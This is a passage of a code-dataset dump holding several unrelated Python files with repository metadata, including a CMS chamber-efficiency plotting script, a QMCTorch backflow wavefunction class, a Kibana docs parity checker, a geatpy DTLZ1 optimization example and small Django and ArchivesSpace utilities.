RingToYMap={(1,4):0,(1,1):1,(1,2):2,(1,3):3,(2,1):4,(2,2):5,(3,1):6,(3,2):7,(4,1):8,(4,2):9}
#split tree to chamber
for idx in range(n_chambers):
ec=chambers[idx][2] == '+'
st=int(chambers[idx][3])
rg=int(chambers[idx][5])
ch=int(chambers[idx][7:])
filename_="%s%s%s.root" % (Prefix,TagProbeFitResult,chambers[idx])
if not os.path.isfile(filename_):
print filename_+" is not found, skip.. "
Effs.append([0.]*6)
continue
f_in=TFile(filename_,"READ");
print "chamber LCT eff reading file: ",f_in
if Postfix=="_MCTruth":
Effs=GetEff(f_in, "lct_effV"+Postfix,"cnt_eff")+GetEff(f_in,"seg_effV"+Postfix,"cnt_eff")
else:
print "reading file: ", f_in, " reading efficiency: ", "seg_effV"+Postfix,"fit_eff"
Effs=GetEff(f_in, "lct_effV"+Postfix,"fit_eff")+GetEff(f_in,"seg_effV"+Postfix,"fit_eff" )
f_in.Close()
iBin_y=RingToYMap[(st,rg)]
iBin_y=11+iBin_y if ec else 10-iBin_y
eff=Effs[0]*100.
if Effs[0]<0.00001:
Effs[0]=0.00001
LCTEff.SetBinContent(ch,iBin_y,Effs[0]*100.);
if (eff>0):
LCTEff_downErr.SetBinContent(ch,iBin_y,Effs[1]*100.);
LCTEff_upErr.SetBinContent(ch,iBin_y,Effs[2]*100.);
eff=Effs[3]*100.
if Effs[3]<0.00001:
Effs[3]=0.00001
SEGEff.SetBinContent(ch,iBin_y,Effs[3]*100.);
if (eff>0):
SEGEff_downErr.SetBinContent(ch,iBin_y,Effs[4]*100.);
SEGEff_upErr.SetBinContent(ch,iBin_y,Effs[5]*100.);
gStyle.SetPaintTextFormat("4.1f")
SegCanvas=TCanvas("segment efficiency","segment efficiency",1500,1000)
SegCanvas.cd()
SEGEff.GetYaxis().SetTitle("Ring")
SEGEff.GetXaxis().SetTitle("Chamber within ring")
SEGEff.GetYaxis().SetTitleOffset(1.35)
# SEGEff.SetTitle("")
SEGEff.Draw("COLZ,TEXT")
SEGEff_upErr.Draw("TEXT,SAME")
SEGEff_downErr.Draw("TEXT,SAME")
SEGEff.SetMaximum(100)
SEGEff.SetMinimum(0)
cms_label.Draw()
LCTCanvas=TCanvas("lct efficiency","lct efficiency",1500,1000)
LCTCanvas.cd()
LCTEff.Draw("COLZ,TEXT")
LCTEff_upErr.Draw("TEXT,SAME")
LCTEff_downErr.Draw("TEXT,SAME")
LCTEff.SetMaximum(100)
LCTEff.SetMinimum(0)
cms_label.Draw()
file_out.cd()
SegCanvas.Write()
SegCanvas.SaveAs("SegCanvas_2D_2016B_matchingAllORME13.pdf")
SegCanvas.SaveAs("SegCanvas_2D_2016B_matchingAllORME13.root")
SegCanvas.SaveAs("SegCanvas_2D_2016B_matchingAllORME13.C")
# LCTCanvas.Write()
# LCTCanvas.SaveAs("LCTCanvas_2D_Run2015CD_0910_HLTIsoT_matchingORME13.pdf")
# LCTCanvas.SaveAs("LCTCanvas_2D_Run2015CD_0910_HLTIsoTkMu_fixedGanging_matchingORME13.root")
# LCTCanvas.SaveAs("LCTCanvas_2D_Run2015CD_0910_HLTIsoTkMu_fixedGanging_matchingORME13.C")
SEGEff.Write()
SEGEff_upErr.Write()
SEGEff_downErr.Write()
LCTEff.Write()
LCTEff_upErr.Write()
LCTEff_downErr.Write()
elif "pt" in Group or "eta" in Group or "phi" in Group:
filename_=Prefix+TagProbeFitResult+"AllStations.root"
print "pt/eta/phi eff reading file: ",f_in
if not os.path.isfile(filename_):
print filename_+" is not found, skip.. "
else:
f_in=TFile(filename_,"READ");
categoryname="cnt_eff" if Postfix=="_MCTruth" else "fit_eff"
LCTEff=GetBinnedEffPlot(f_in, "lct_effV"+Postfix,categoryname)
SEGEff=GetBinnedEffPlot(f_in, "seg_effV"+Postfix,categoryname)
f_in.Close()
file_out.cd()
if LCTEff:
LCTEff.Write("LCTEff")
if SEGEff:
SEGEff.Write("SEGEff")
#raw_input("Plots are saved in "+ResultPlotsFileName+". Press ENTER to exit")
print "Plots are saved in",ResultPlotsFileName+"."
file_out.Close()
| [
"senka.duric@cern.ch"
] | senka.duric@cern.ch | |
5d4d84f517359cc086882223987fee6ac455939a | cb9f44cccdf7cd9b4dec59f18246825364fc6533 | /qmctorch/wavefunction/slater_combined_jastrow_backflow.py | 023ea2861cbc8d430bcc4d0a704f19d39aed7699 | [
"Apache-2.0"
] | permissive | NLESC-JCER/QMCTorch | 83747e0ee41ed74be1ced4d8e9b9897dfcc1bd6a | 439a79e97ee63057e3032d28a1a5ebafd2d5b5e4 | refs/heads/master | 2023-05-25T05:22:06.690810 | 2023-05-13T10:10:13 | 2023-05-13T10:10:13 | 255,629,819 | 22 | 3 | Apache-2.0 | 2023-08-29T19:27:15 | 2020-04-14T14:18:24 | Python | UTF-8 | Python | false | false | 11,173 | py |
import numpy as np
import torch
from .slater_jastrow import SlaterJastrow
import operator
from .jastrows.elec_elec.kernels.pade_jastrow_kernel import PadeJastrowKernel as PadeJastrowKernelElecElec
from .jastrows.jastrow_factor_combined_terms import JastrowFactorCombinedTerms
from .jastrows.elec_nuclei.kernels.pade_jastrow_kernel import PadeJastrowKernel as PadeJastrowKernelElecNuc
from .orbitals.atomic_orbitals_backflow import AtomicOrbitalsBackFlow
from .orbitals.atomic_orbitals_orbital_dependent_backflow import AtomicOrbitalsOrbitalDependentBackFlow
from .orbitals.backflow.kernels import BackFlowKernelInverse
class SlaterManyBodyJastrowBackflow(SlaterJastrow):
def __init__(self, mol, configs='ground_state',
kinetic='jacobi',
jastrow_kernel={
'ee': PadeJastrowKernelElecElec,
'en': PadeJastrowKernelElecNuc,
'een': None},
jastrow_kernel_kwargs={
'ee': {},
'en': {},
'een': {}},
backflow_kernel=BackFlowKernelInverse,
backflow_kernel_kwargs={},
orbital_dependent_backflow=False,
cuda=False,
include_all_mo=True):
"""Slater Jastrow wave function with many-body Jastrow factor and backflow
.. math::
\\Psi(R_{at}, r) = J(R_{at}, r)\\sum_n c_n D^\\uparrow_n(q^\\uparrow)D^\\downarrow_n(q^\\downarrow)
with
.. math::
J(r) = \\exp\\left( K_{ee}(r) + K_{en}(R_{at},r) + K_{een}(R_{at}, r) \\right)
with the different kernels representing electron-electron, electron-nuclei and electron-electron-nuclei terms and
.. math::
q(r_i) = r_i + \\sum){j\\neq i} K_{BF}(r_{ij})(r_i-r_j)
is a backflow transformation defined by the kernel K_{BF}. Note that different transformation
can be used for different orbital via the `orbital_dependent_backflow` option.
Args:
Args:
mol (Molecule): a QMCTorch molecule object
configs (str, optional): defines the CI configurations to be used. Defaults to 'ground_state'.
- ground_state : only the ground state determinant in the wave function
- single(n,m) : only single excitation with n electrons and m orbitals
- single_double(n,m) : single and double excitation with n electrons and m orbitals
- cas(n, m) : all possible configuration using n eletrons and m orbitals
kinetic (str, optional): method to compute the kinetic energy. Defaults to 'jacobi'.
- jacobi : use the Jacobi formula to compute the kinetic energy
- auto : use automatic differentiation to compute the kinetic energy
jastrow_kernel (dict, optional) : different Jastrow kernels for the different terms.
By default only electron-electron and electron-nuclei terms are used
jastrow_kernel_kwargs (dict, optional) : keyword arguments for the jastrow kernels contructor
backflow_kernel (BackFlowKernelBase, optional) : kernel function of the backflow transformation.
- By default an inverse kernel K(r_{ij}) = w/r_{ij} is used
backflow_kernel_kwargs (dict, optional) : keyword arguments for the backflow kernel contructor
orbital_dependent_backflow (bool, optional) : every orbital has a different transformation if True. Default to False
cuda (bool, optional): turns GPU ON/OFF Defaults to False.
include_all_mo (bool, optional): include either all molecular orbitals or only the ones that are
popualted in the configs. Defaults to False
Examples::
>>> from qmctorch.scf import Molecule
>>> from qmctorch.wavefunction import SlaterManyBodyJastrowBackflow
>>> mol = Molecule('h2o.xyz', calculator='adf', basis = 'dzp')
>>> wf = SlaterManyBodyJastrowBackflow(mol, configs='cas(2,2)')
"""
super().__init__(mol, configs, kinetic, None, {}, cuda, include_all_mo)
# process the backflow transformation
if orbital_dependent_backflow:
self.ao = AtomicOrbitalsOrbitalDependentBackFlow(
mol, backflow_kernel, backflow_kernel_kwargs, cuda)
else:
self.ao = AtomicOrbitalsBackFlow(
mol, backflow_kernel, backflow_kernel_kwargs, cuda)
if self.cuda:
self.ao = self.ao.to(self.device)
# process the Jastrow
if jastrow_kernel is not None:
for k in ['ee', 'en', 'een']:
if k not in jastrow_kernel.keys():
jastrow_kernel[k] = None
if k not in jastrow_kernel_kwargs.keys():
jastrow_kernel_kwargs[k] = None
self.use_jastrow = True
self.jastrow_type = 'JastrowFactorCombinedTerms'
self.jastrow = JastrowFactorCombinedTerms(
self.mol.nup, self.mol.ndown,
torch.as_tensor(self.mol.atom_coords),
jastrow_kernel=jastrow_kernel,
jastrow_kernel_kwargs=jastrow_kernel_kwargs,
cuda=cuda)
if self.cuda:
for term in self.jastrow.jastrow_terms:
term = term.to(self.device)
self.log_data()
def forward(self, x, ao=None):
"""computes the value of the wave function for the sampling points
.. math::
J(R) \\Psi(R) = J(R) \\sum_{n} c_n D^{u}_n(r^u) \\times D^{d}_n(r^d)
Args:
x (torch.tensor): sampling points (Nbatch, 3*Nelec)
ao (torch.tensor, optional): values of the atomic orbitals (Nbatch, Nelec, Nao)
Returns:
torch.tensor: values of the wave functions at each sampling point (Nbatch, 1)
Examples::
>>> mol = Molecule('h2.xyz', calculator='adf', basis = 'dzp')
>>> wf = SlaterJastrow(mol, configs='cas(2,2)')
>>> pos = torch.rand(500,6)
>>> vals = wf(pos)
"""
# compute the jastrow from the pos
if self.use_jastrow:
J = self.jastrow(x)
# atomic orbital
if ao is None:
x = self.ao(x)
else:
x = ao
# molecular orbitals
x = self.mo_scf(x)
# mix the mos
x = self.mo(x)
# pool the mos
x = self.pool(x)
# compute the CI and return
if self.use_jastrow:
return J * self.fc(x)
else:
return self.fc(x)
def ao2mo(self, ao):
"""transforms AO values in to MO values."""
return self.mo(self.mo_scf(ao))
def pos2mo(self, x, derivative=0, sum_grad=True):
"""Compute the MO vals from the pos
Args:
x ([type]): [description]
derivative (int, optional): [description]. Defaults to 0.
sum_grad (bool, optional): [description]. Defaults to True.
Returns:
[type]: [description]
"""
ao = self.ao(x, derivative=derivative, sum_grad=sum_grad)
return self.ao2mo(ao)
def kinetic_energy_jacobi(self, x, **kwargs):
r"""Compute the value of the kinetic enery using the Jacobi Formula.
.. math::
\\frac{\Delta (J(R) \Psi(R))}{ J(R) \Psi(R)} = \\frac{\\Delta J(R)}{J(R}
+ 2 \\frac{\\nabla J(R)}{J(R)} \\frac{\\nabla \\Psi(R)}{\\Psi(R)}
+ \\frac{\\Delta \\Psi(R)}{\\Psi(R)}
The lapacian of the determinental part is computed via
.. math::
\\Delta_i \\Psi(R) \\sum_n c_n ( \\frac{\\Delta_i D_n^{u}}{D_n^{u}} +
\\frac{\\Delta_i D_n^{d}}{D_n^{d}} +
2 \\frac{\\nabla_i D_n^{u}}{D_n^{u}} \\frac{\\nabla_i D_n^{d}}{D_n^{d}} )
D_n^{u} D_n^{d}
Since the backflow orbitals are multi-electronic the laplacian of the determinants
are obtained
.. math::
\\frac{\\Delta det(A)}{det(A)} = Tr(A^{-1} \\Delta A) +
Tr(A^{-1} \\nabla A) Tr(A^{-1} \\nabla A) +
Tr( (A^{-1} \\nabla A) (A^{-1} \\nabla A ))
Args:
x (torch.tensor): sampling points (Nbatch, 3*Nelec)
Returns:
torch.tensor: values of the kinetic energy at each sampling points
"""
# get ao values
ao, dao, d2ao = self.ao(
x, derivative=[0, 1, 2], sum_grad=False)
# get the mo values
mo = self.ao2mo(ao)
dmo = self.ao2mo(dao)
d2mo = self.ao2mo(d2ao)
# compute the value of the slater det
slater_dets = self.pool(mo)
sum_slater_dets = self.fc(slater_dets)
# compute ( tr(A_u^-1\Delta A_u) + tr(A_d^-1\Delta A_d) )
hess = self.pool.operator(mo, d2mo)
# compute (tr(A_u^-1\nabla A_u) and tr(A_d^-1\nabla A_d))
grad = self.pool.operator(mo, dmo, op=None)
# compute (tr((A_u^-1\nabla A_u)^2) + tr((A_d^-1\nabla A_d))^2)
grad2 = self.pool.operator(mo, dmo, op_squared=True)
# assemble the total second derivative term
hess = (hess.sum(0)
+ operator.add(*[(g**2).sum(0) for g in grad])
- grad2.sum(0)
+ 2 * operator.mul(*grad).sum(0))
hess = self.fc(hess * slater_dets) / sum_slater_dets
if self.use_jastrow is False:
return -0.5 * hess
# compute the Jastrow terms
jast, djast, d2jast = self.jastrow(x,
derivative=[0, 1, 2],
sum_grad=False)
# prepare the second derivative term d2Jast/Jast
# Nbatch x Nelec
d2jast = d2jast / jast
# prepare the first derivative term
djast = djast / jast.unsqueeze(-1)
# -> Nelec x Ndim x Nbatch
djast = djast.permute(2, 1, 0)
# -> [Nelec*Ndim] x Nbatch
djast = djast.reshape(-1, djast.shape[-1])
# prepare the grad of the dets
# [Nelec*Ndim] x Nbatch x 1
grad_val = self.fc(operator.add(*grad) *
slater_dets) / sum_slater_dets
# [Nelec*Ndim] x Nbatch
grad_val = grad_val.squeeze()
# assemble the derivaite terms
out = d2jast.sum(-1) + 2*(grad_val * djast).sum(0) + \
hess.squeeze(-1)
return -0.5 * out.unsqueeze(-1)
def gradients_jacobi(self, x, sum_grad=True):
"""Computes the gradients of the wf using Jacobi's Formula
Args:
x ([type]): [description]
"""
raise NotImplementedError(
'Gradient through Jacobi formulat not implemented for backflow orbitals')
| [
"nicolas.gm.renaud@gmail.com"
] | nicolas.gm.renaud@gmail.com |
0b8906daed72ba0039fe0761e437da2e6a1ea053 | 312fe86a9540b7bfabcaadd5f20ba107755b195b | /playbooks/monitoring/kibana/docs_compare.py | f421ce5d3d53e5c2befc2e6f379b42c935ca6489 | [
"Apache-2.0"
] | permissive | isabella232/elastic-stack-testing | fa623cce484ecf870c5e90da6b401b3f4c2ce296 | 1526ab4b4ca187dc5f0eb81be2fed058fc556082 | refs/heads/master | 2023-01-05T13:26:22.430049 | 2020-11-09T18:19:44 | 2020-11-09T18:19:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,709 | py | '''
Usage:
python docs_compare.py /path/to/legacy/docs /path/to/metricbeat/docs
'''
from docs_compare_util import check_parity
import sys
allowed_deletions_from_metricbeat_docs_extra = [
# 'path.to.field'
'kibana_stats.response_times.max',
'kibana_stats.response_times.average'
]
unused_kibana_usage_properties = [
"apm",
"localization",
"lens",
"actions",
"alerts"
]
def handle_special_case_kibana_settings(legacy_doc, metricbeat_doc):
# Legacy collection will index kibana_settings.xpack.default_admin_email as null
# whereas Metricbeat collection simply won't index it. So if we find kibana_settings.xpack.default_admin_email
# is null, we simply remove it
if "xpack" in legacy_doc["kibana_settings"] \
and "default_admin_email" in legacy_doc["kibana_settings"]["xpack"] \
and legacy_doc["kibana_settings"]["xpack"]["default_admin_email"] == None:
legacy_doc["kibana_settings"]["xpack"].pop("default_admin_email")
def handle_special_case_kibana_stats(legacy_doc, metricbeat_doc):
# Special case this until we have resolution on https://github.com/elastic/kibana/pull/70677#issuecomment-662531529
metricbeat_doc["kibana_stats"]["usage"]["search"]["total"] = legacy_doc["kibana_stats"]["usage"]["search"]["total"]
metricbeat_doc["kibana_stats"]["usage"]["search"]["averageDuration"] = legacy_doc["kibana_stats"]["usage"]["search"]["averageDuration"]
# Special case for https://github.com/elastic/kibana/pull/76730
# To be removed if/when https://github.com/elastic/beats/issues/21092 is resolved
metricbeat_doc["kibana_stats"]["os"]["cpuacct"] = legacy_doc["kibana_stats"]["os"]["cpuacct"]
metricbeat_doc["kibana_stats"]["os"]["cpu"] = legacy_doc["kibana_stats"]["os"]["cpu"]
def filter_kibana_usage_stats(legacy_doc, metricbeat_doc):
for i in unused_kibana_usage_properties:
legacy_doc["kibana_stats"]["usage"][i] = metricbeat_doc["kibana_stats"]["usage"][i]
def handle_special_cases(doc_type, legacy_doc, metricbeat_doc):
if doc_type == "kibana_settings":
handle_special_case_kibana_settings(legacy_doc, metricbeat_doc)
if doc_type == "kibana_stats":
# Lens, Actions, and other usage stats might not report consistently.
# https://github.com/elastic/kibana/issues/80983
# https://github.com/elastic/kibana/issues/80986
# https://github.com/elastic/kibana/issues/81944
# so, we filter out w/e we don't use (or might change)
filter_kibana_usage_stats(legacy_doc, metricbeat_doc)
handle_special_case_kibana_stats(legacy_doc, metricbeat_doc)
check_parity(handle_special_cases, allowed_deletions_from_metricbeat_docs_extra=allowed_deletions_from_metricbeat_docs_extra)
| [
"noreply@github.com"
] | isabella232.noreply@github.com |
d0f72f2c74e04492606256a0d23728e050e02a0e | 7a91286a3636ad9606d5933619401cc45bee1b10 | /lib/banking/balance.py | db0904c2b45181d536718a1e76a3f25b00e70e80 | [] | no_license | phriscage/banking_application | d063bbb24c3e1061c2110c1aace1d67ae53e70cc | cc120437213a25e1864db14509c6d143b65d8102 | refs/heads/master | 2019-01-02T04:00:30.034945 | 2015-01-31T03:50:42 | 2015-01-31T03:50:42 | 30,099,098 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 574 | py | """
balance class
"""
class Balance(object):
""" the balance class includes the balance operations """
def __init__(self):
""" instantiate the class """
self.total = 0
def add(self, value):
""" add value to the total
Args:
value (int): numeric value
"""
value = int(value)
self.total += value
def subtract(self, value):
""" subtract value from the total
Args:
value (int): numeric value
"""
value = int(value)
self.total -= value
| [
"phriscage@gmail.com"
] | phriscage@gmail.com |
019082fa9d75ecfb96a0de970631cd8ecb05eaeb | 98ad5d08eda9dbce55947b53dc8e1627e7be5404 | /backend/blog_api/serializers.py | e57bb6df05843dd07c9c6292467f59f623977218 | [] | no_license | mhkmcp/blog-react-djagno | 651a9f1f65f0c54804ceb8ea51cddf0587ef2c81 | 6d0904a08311590b8d07a99c6c02d8f50bbaa0de | refs/heads/main | 2023-08-03T16:28:52.666182 | 2021-09-20T15:00:48 | 2021-09-20T15:00:48 | 408,421,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | from rest_framework import serializers
from blog.models import Post
class PostSerializer(serializers.ModelSerializer):
class Meta:
model = Post
fields = ('id', 'title', 'excerpt', 'content', 'author', 'status') | [
"mhkmcp@yahoo.com"
] | mhkmcp@yahoo.com |
5ae88cd77491d8b24fad6d607239ecf25badf6b8 | 31764c3903bd7b7cde4649860eb843bc8545095d | /books/Language/python/geatpy/code/A02_DTLZ1.py | 8161e8d8fd83f130fdf31b1d442681d18bd7f173 | [] | no_license | madokast/madokast.github.io.old | bf3aa967ee7ccdba99ce7d667e02f8672ae8b00e | 3af6570401c9f7f11932cc3bac79f4979507c79b | refs/heads/master | 2023-06-20T07:52:50.119738 | 2021-07-22T01:35:12 | 2021-07-22T01:35:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,670 | py | # -*- coding: utf-8 -*-
""" QuickStart """
import numpy as np
import geatpy as ea
# 自定义问题类
class MyProblem(ea.Problem): # 继承Problem父类
def __init__(self, M): # M 目标维数,测试中使用 3
# 问题的名字
name = 'DTLZ1' # 初始化name(函数名称,可以随意设置)
# 目标变量是最大化还是最小化
maxormins = [1] * M # 初始化maxormins(目标最小最大化标记列表,1:最小化该目标;-1:最大化该目标)
# 决策变量维数 - 就是变量
Dim = M + 4 # 初始化Dim(决策变量维数)
# 决策变量是实数还是整数
varTypes = np.array([0] * Dim) # 初始化varTypes(决策变量的类型,0:实数;1:整数)
# 决策变量下界和上界
lb = [0] * Dim # 决策变量下界
ub = [1] * Dim # 决策变量上界
# 决策变量是否包含下边界和上边界(0表示不包含该变量的下边界,1表示包含)
lbin = [1] * Dim # 决策变量下边界
ubin = [1] * Dim # 决策变量上边界
# 调用父类构造方法完成实例化
ea.Problem.__init__(self, name, M, maxormins, Dim, varTypes, lb, ub, lbin, ubin)
def aimFunc(self, pop): # 目标函数
# 总是就是写一个函数从 pop.Phen 到 pop.ObjV
Vars = pop.Phen # 得到决策变量矩阵
XM = Vars[:,(self.M-1):]
g = 100 * (self.Dim - self.M + 1 + np.sum(((XM - 0.5)**2 - np.cos(20 * np.pi * (XM - 0.5))), 1, keepdims = True))
ones_metrix = np.ones((Vars.shape[0], 1))
f = 0.5 * np.fliplr(np.cumprod(np.hstack([ones_metrix, Vars[:,:self.M-1]]), 1)) * np.hstack([ones_metrix, 1 - Vars[:, range(self.M - 2, -1, -1)]]) * np.tile(1 + g, (1, self.M))
pop.ObjV = f # 把求得的目标函数值赋值给种群pop的ObjV
def calReferObjV(self): # 计算全局最优解
uniformPoint, ans = ea.crtup(self.M, 10000) # 生成10000个在各目标的单位维度上均匀分布的参考点
globalBestObjV = uniformPoint / 2
return globalBestObjV
# 编写执行代码
"""===============================实例化问题对象=============================="""
M = 3 # 设置目标维数
problem = MyProblem(M) # 生成问题对象
"""==================================种群设置================================="""
Encoding = 'RI' # 编码方式
NIND = 100 # 种群规模
Field = ea.crtfld(Encoding, problem.varTypes, problem.ranges, problem.borders) # 创建区域描述器
population = ea.Population(Encoding, Field, NIND) # 实例化种群对象(此时种群还没被初始化,仅仅是完成种群对象的实例化)
"""================================算法参数设置==============================="""
myAlgorithm = ea.moea_NSGA3_templet(problem, population) # 实例化一个算法模板对象
myAlgorithm.MAXGEN = 500 # 最大进化代数
myAlgorithm.logTras = 1 # 设置每多少代记录日志,若设置成0则表示不记录日志
myAlgorithm.verbose = True # 设置是否打印输出日志信息
myAlgorithm.drawing = 0 # 设置绘图方式(0:不绘图;1:绘制结果图;2:绘制过程动画)
"""==========================调用算法模板进行种群进化=========================
调用run执行算法模板,得到帕累托最优解集NDSet以及最后一代种群。NDSet是一个种群类Population的对象。
NDSet.ObjV为最优解个体的目标函数值;NDSet.Phen为对应的决策变量值。
详见Population.py中关于种群类的定义。
"""
[NDSet, population] = myAlgorithm.run() # 执行算法模板,得到非支配种群以及最后一代种群
# NDSet.save() # 把非支配种群的信息保存到文件中
"""==================================输出结果=============================="""
print('用时:%f 秒' % myAlgorithm.passTime)
print('评价次数:%d 次' % myAlgorithm.evalsNum)
print('非支配个体数:%d 个' % NDSet.sizes) if NDSet.sizes != 0 else print('没有找到可行解!')
# if myAlgorithm.log is not None and NDSet.sizes != 0:
# print('GD', myAlgorithm.log['gd'][-1])
# print('IGD', myAlgorithm.log['igd'][-1])
# print('HV', myAlgorithm.log['hv'][-1])
# print('Spacing', myAlgorithm.log['spacing'][-1])
# """=========================进化过程指标追踪分析========================="""
# metricName = [['igd'], ['hv']]
# Metrics = np.array([myAlgorithm.log[metricName[i][0]] for i in range(len(metricName))]).T
# 绘制指标追踪分析图
# ea.trcplot(Metrics, labels=metricName, titles=metricName) | [
"578562554@qq.com"
] | 578562554@qq.com |
ef77869c6d10660f4ae73774533726d7ec573601 | 3f9dcfb4f76747c97d756b87aec50dc38ede8cb0 | /manage.py | bf15b5930f88e4a520c3f346244e26ec06884ba1 | [] | no_license | gabrielcoder247/realone | c7887311902dcc0952a76667b863d9c99b0c8452 | 810661e90c2931dbd81a73f07944e7f5635f1ddc | refs/heads/master | 2022-12-03T19:20:46.313758 | 2020-04-06T11:46:09 | 2020-04-06T11:46:09 | 253,480,350 | 0 | 0 | null | 2022-11-22T05:27:59 | 2020-04-06T11:43:33 | Python | UTF-8 | Python | false | false | 629 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'rentorbuy.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"gabrielcoder247@gmail.com"
] | gabrielcoder247@gmail.com |
ff27dbd756b4dde221c7ca61cb5f0e3da88cfb58 | a60bc58d17720a2f1e2f8778146248c01adf8a5a | /post_subjects.py | 3221347af689853f3f40fd00b7bd68bace9316dc | [] | no_license | meau/bentley_scripts | 08bdbc159939731966bdeda396c93022212f922d | e17abff89a775b2b7273661e92b849b85e6a1f8d | refs/heads/master | 2021-01-17T05:46:24.838505 | 2015-09-21T16:17:25 | 2015-09-21T16:17:25 | 42,587,433 | 1 | 0 | null | 2015-09-16T13:03:26 | 2015-09-16T13:03:25 | Python | UTF-8 | Python | false | false | 1,925 | py | """
curl -H "X-ArchivesSpace-Session:$TOKEN" -d '{"source":"lcsh","vocabulary":"/vocabularies/1","terms":[{"term":"Cheese", "term_type":"topical","vocabulary":"/vocabularies/1"},{"term":"Michigan","term_type":"geographic","vocabulary":"/vocabularies/1"}]}' http://localhost:8089/subjects
"""
import requests
import json
import csv
baseURL = 'http://localhost:8089'
user='admin'
password='admin'
auth = requests.post(baseURL + '/users/'+user+'/login?password='+password).json()
session = auth["session"]
headers = {'X-ArchivesSpace-Session':session}
subjects_csv = 'C:/Users/Public/Documents/aspace_subjects.csv'
"""
subject_ids = requests.get(baseURL+'/subjects?all_ids=true').json()
for i in subject_ids:
subject_json = requests.get(baseURL+'/subjects/'+str(i)).json()
print subject_json['title'], subject_json['uri']
"""
with open(subjects_csv,'rb') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
row_indexes = len(row) - 1
source = row[1]
terms_list = []
for row_num in range(3,row_indexes + 1, 2):
term = row[row_num]
term_type = row[row_num+1]
terms_dict = {}
terms_dict["term"] = term
terms_dict["term_type"] = term_type
terms_dict["vocabulary"] = "/vocabularies/1"
terms_list.append(terms_dict)
data = json.dumps({"source":source,"vocabulary":"/vocabularies/1","terms":[i for i in terms_list]})
subjects = requests.post(baseURL+'/subjects', headers=headers, data=data).json()
if 'status' in subjects:
if subjects['status'] == 'Created':
subject_uri = subjects['uri']
row.append(subject_uri)
with open('C:/Users/Public/Documents/posted_subjects.csv','ab') as csv_out:
writer = csv.writer(csv_out)
writer.writerow(row)
print subjects
| [
"djpillen@umich.edu"
] | djpillen@umich.edu |
bce301e020d3e0032f55ca6472c9e2c8cf63c121 | aa54fd5cafc65d18ceac52097237482cec27f674 | /planetary_system_stacker/Test_programs/count_lines_of_code.py | 5f56284c52c4e38aa219fd0850afce7de4024311 | [] | no_license | Rolf-Hempel/PlanetarySystemStacker | 84f6934e6748177fb1aca20b54392dee5c3f2e3c | 304952a8ac8e991e111e3fe2dba95a6ca4304b4e | refs/heads/master | 2023-07-20T04:11:06.663774 | 2023-07-17T15:20:15 | 2023-07-17T15:20:15 | 148,365,620 | 228 | 34 | null | 2023-09-01T16:33:05 | 2018-09-11T19:00:13 | Python | UTF-8 | Python | false | false | 1,442 | py | # -*- coding: utf-8; -*-
import os
def countlines(start, lines=0, header=True, begin_start=None):
if header:
print('{:>10} |{:>10} | {:<20}'.format('ADDED', 'TOTAL', 'FILE'))
print('{:->11}|{:->11}|{:->20}'.format('', '', ''))
for thing in os.listdir(start):
thing = os.path.join(start, thing)
# With the following line only non-GUI code is counted.
if os.path.isfile(thing) and not os.path.isfile(thing[:-3] + '.ui'):
# As an alternative count all files.
# if os.path.isfile(thing):
if thing.endswith('.py'):
with open(thing, 'r') as f:
newlines = f.readlines()
newlines = len(newlines)
lines += newlines
if begin_start is not None:
reldir_of_thing = '.' + thing.replace(begin_start, '')
else:
reldir_of_thing = '.' + thing.replace(start, '')
print('{:>10} |{:>10} | {:<20}'.format(
newlines, lines, reldir_of_thing))
for thing in os.listdir(start):
thing = os.path.join(start, thing)
if os.path.isdir(thing):
lines = countlines(thing, lines, header=False, begin_start=start)
return lines
directory = r'D:\SW-Development\Python\PlanetarySystemStacker\planetary_system_stacker'
lines = countlines(directory)
| [
"rolf6419@gmx.de"
] | rolf6419@gmx.de |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.